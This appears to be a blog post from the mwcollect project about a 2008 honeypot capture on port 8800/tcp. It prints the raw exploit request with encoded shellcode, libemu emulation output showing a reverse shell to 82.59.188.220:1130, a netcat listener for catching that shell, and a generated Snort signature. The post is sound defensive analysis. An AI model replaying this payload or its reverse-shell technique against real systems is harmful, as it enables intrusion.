We will provide live commit logs here soon. Until then feel free to view the mwcollect.org repository with Trac.
Recently, the SANS ICS and others reported a spike in 8800/tcp traffic. As there is only few information available about what is going on on that port all of a sudden, we take the chance and demonstrate how to use tools from mwcollect to get some insights.
The first thing we need is packets, ideally captures of complete sessions. Hint: Ask your local honeynet guy - he is hopefully running honeytrap. If so, chances are good that he can provide packet dumps and session captures like the one below, recorded on 8800/tcp on 2008-06-08:
GET / HTTP/1.0 User-Agent: DFXPDFXPAAA.........IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIilCZjKpMkXYiKOKOKOSPLK2LGTwTLKcuulnk1lWuSHvazOnk2oVxlKaOQ0Vaxk2il KDtLKFa8ntqkpoiNLotKpQdww9QxJdMEQYRXkL4ekpTwTdhqezENksoEtS1ZK3VLKVlRknk3o5LgqzKtC6Lnkk90lddUL3QySfQkkQtlKpCVPLKQPTLlK405LlmLKSpc8qNrHLNpNdNXlrpYoiFQvpS1vPh5cVR1xRWsCtrqOV4i oN058zkzMkL5kpPIohVqOniM50fOqZMEXuR3e2JwryozpqxyIwyl5NM3gIokfPSbsScF3QS0SPCBsKON0qx0RUkMliLcV58ETRJ2FPSMYyqoe1xZLL9NJsPPWkOhV2JVppQRuyohPQvbJRDpfQx3SRMbJf01IEyzlniJGpjQTMYX b4qIPycnJoeOyymYnG2vMkNpBtllMCJVXNKLklkPhRRYnlsR6kOPuuxKOxVckaGV2PQpQ0QcZC1PQpQSepQ9oJpqxNMJyS58NScyoIFCZyoyoVWYoxP58M7BYo6SIyoBUuTKOKfkOQgiliozp58Hpnj34Cov3YoXVKOxPA Authorization: Basic UVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlF VRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQm5TOEFFSkNRa0pBejBtYUJ5djhQUWxKcUFsak5MandGV25UdnVFUkdXRkNMK3E5MTZxOTE1Ly9uUWtKQ1FrSkNRa0pDUWt KQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0p DUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkN Ra0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1F rSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWt KQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0p DUWtKQ1FrST0=
Looks like someone is trying to exploit a vulnerability in some HTTP service. Let's check if the User-Agent and Authorization arguments contain some sort of shellcode. This can easily be done by using libemu's sctest utility:
/opt/libemu/bin/sctest -Sgs 1000000 < rawsession-8800tcp
verbose = 0
success offset = 0x0000002c
hooked ExitProcess
hooked ExitThread
Hook me Captain Cook!
environment/win32/env_w32_dll_export_ws2_32_hooks.c:656 env_w32_hook_WSAStartup
WSAStartup version 2
Hook me Captain Cook!
environment/win32/env_w32_dll_export_ws2_32_hooks.c:578 env_w32_hook_WSASocketA
SOCKET WSASocket(af=2, type=1, protocol=0, lpProtocolInfo=0, group=0, dwFlags=0);
Hook me Captain Cook!
environment/win32/env_w32_dll_export_ws2_32_hooks.c:228 env_w32_hook_connect
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:151 env_w32_hook_CreateProcessA
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:896 env_w32_hook_WaitForSingleObject
WaitForSingleObject(hHandle=4712, dwMilliseconds=-1)
Hook me Captain Cook!
environment/win32/env_w32_dll_export_ws2_32_hooks.c:190 env_w32_hook_closesocket
Hook me Captain Cook!
environment/win32/env_w32_dll_export_kernel32_hooks.c:870 env_w32_hook_SetUnhandledExceptionFilter
Exception filter 7c800000
cpu error opcode 62 not supported
stepcount 172737
HMODULE LoadLibraryA (
LPCTSTR lpFileName = 0x0012fe80 =>
= "ws2_32";
) = 0x71a10000;
int WSAStartup (
WORD wVersionRequested = 2;
LPWSADATA lpWSAData = 1244276;
) = 0;
SOCKET WSASocket (
int af = 2;
int type = 1;
int protocol = 0;
LPWSAPROTOCOL_INFO lpProtocolInfo = 0;
GROUP g = 0;
DWORD dwFlags = 0;
) = 66;
int connect (
SOCKET s = 66;
struct sockaddr_in * name = 0x0012fe6c =>
struct = {
short sin_family = 2;
unsigned short sin_port = 27140 (port=1130);
struct in_addr sin_addr = {
unsigned long s_addr = -591643822 (host=82.59.188.220);
};
char sin_zero = " ";
};
int namelen = 16;
) = 0;
BOOL CreateProcess (
LPCWSTR pszImageName = 0x00000000 =>
none;
LPCWSTR pszCmdLine = 0x0012fe60 =>
= "cmd";
LPSECURITY_ATTRIBUTES psaProcess = 0x00000000 =>
none;
LPSECURITY_ATTRIBUTES psaThread = 0x00000000 =>
none;
BOOL fInheritHandles = 1;
DWORD fdwCreate = 0;
LPVOID pvEnvironment = 0x00000000 =>
none;
LPWSTR pszCurDir = 0x00000000 =>
none;
struct LPSTARTUPINFOW psiStartInfo = 0x0012fe0c =>
struct = {
DWORD cb = 68;
LPTSTR lpReserved = 0;
LPTSTR lpDesktop = 0;
LPTSTR lpTitle = 0;
DWORD dwX = 0;
DWORD dwY = 0;
DWORD dwXSize = 0;
DWORD dwYSize = 0;
DWORD dwXCountChars = 0;
DWORD dwYCountChars = 0;
DWORD dwFillAttribute = 0;
DWORD dwFlags = 257;
WORD wShowWindow = 0;
WORD cbReserved2 = 0;
LPBYTE lpReserved2 = 0;
HANDLE hStdInput = 66;
HANDLE hStdOutput = 66;
HANDLE hStdError = 66;
};
struct PROCESS_INFORMATION pProcInfo = 0x0052f74c =>
struct = {
HANDLE hProcess = 4711;
HANDLE hThread = 4712;
DWORD dwProcessId = 4713;
DWORD dwThreadId = 4714;
};
) = -1;
DWORD WaitForSingleObject (
HANDLE hHandle = 4712;
DWORD dwMilliseconds = -1;
) = 0;
int closesocket (
SOCKET s = 66;
) = 0;
Cool! We found the start position of some shellcode at offset 0x0000002c. And not only that, libemu performs a deep analysis of what it does. The shellcode seems to connect to a host (82.59.188.220:1130) offering a command line prompt. Now let's start a netcat listener on port 1130/tcp to catch the shell and process the shellcode again, this time with --interactive. We redirect the connect call to localhost with --connect 127.0.0.1:1130 and replace the executed command shell by invoking --cmd cmd="replacement string". And we have full control over the victim. So again, running
/opt/libemu/bin/sctest --cmd cmd="wine cmd_orig.exe" --interactive --connect 127.0.0.1:1130 -Sgs 1000000 < rawsession-8800tcp
in a terminal (where cmd_orig.exe is an original Windows cmd.exe file placed in your wine environment) and
$ netcat -l -p 1130 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\tw\Desktop>
in a different terminal in parallel fools the shellcode and gives us the shell.
What else? Assumed you have more than one trace, wouldn't it be cool to extract the parts they have in common? And eventually build an IDS signature to detect and block future intrusion attempts? Have a look at nebula, it gives you what you want. Start the daemon as follows (-t 20 sets the cluster size threshold to 20, so you need at least as much different exploit variants):
$ /opt/nebula/bin/nebula -s noodlesoup -t 20
The daemon accepts submissions on the default port now. To submit session dumps, use the nebula command line client:
$ /opt/nebula/bin/nebulaclient -s noodlesoup -c localhost -p 4712 -d /path/to/dumpfiles/
In our case we had 222 samples of 28 unique exploit variants. Nebula produced the following snort signature, showing that the Authorization string is static in all samples and thus perfectly suited for a detection rule:
---- Signature type: snort ----------------------------------------------------------------------------
alert tcp any any -> $HOME_NET 8800 (msg: "nebula rule 2000001 rev. 1"; \
content: "GET / HTTP/1.0|0d 0a|User-Agent\: DFXPDFXPAAA|eb 03|Y|eb 05 e8 f8 ff ff ff|II"; offset: 0; depth: 51; \
content: "QZj"; distance: 16; within: 70; \
content: "A0A"; distance: 4; within: 24; \
content: "XP8"; distance: 1; within: 21; \
content: "ZK"; distance: 9; within: 523; \
content: "|0d 0a|Authorization\: Basic UVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRk
JRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCUVVGQlFVRkJRVUZCU
VVGQlFVRkJRVUZCUVVGQm5TOEFFSkNRa0pBejBtYUJ5djhQUWxKcUFsak5MandGV25UdnVFUkdXRkNMK3E5MTZxOTE1Ly9uUWtKQ1FrSkNRa0pDUWtKQ1Fr
SkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0p
DUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1
FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa
0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtK
Q1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkN
Ra0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUW
tKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrS
kNRa0pDUWtKQ1FrSkNRa0pDUWtKQ1FrST0=|0d 0a 0d 0a|"; distance: 60; within: 1854; \
sid: 2000001; rev: 1;)
-------------------------------------------------------------------------------------------------------
That's it so far. If you want to try it yourself, grab the sample used in the above tests from here. And next time they got the peak and you got the analysis. :-)
Have fun!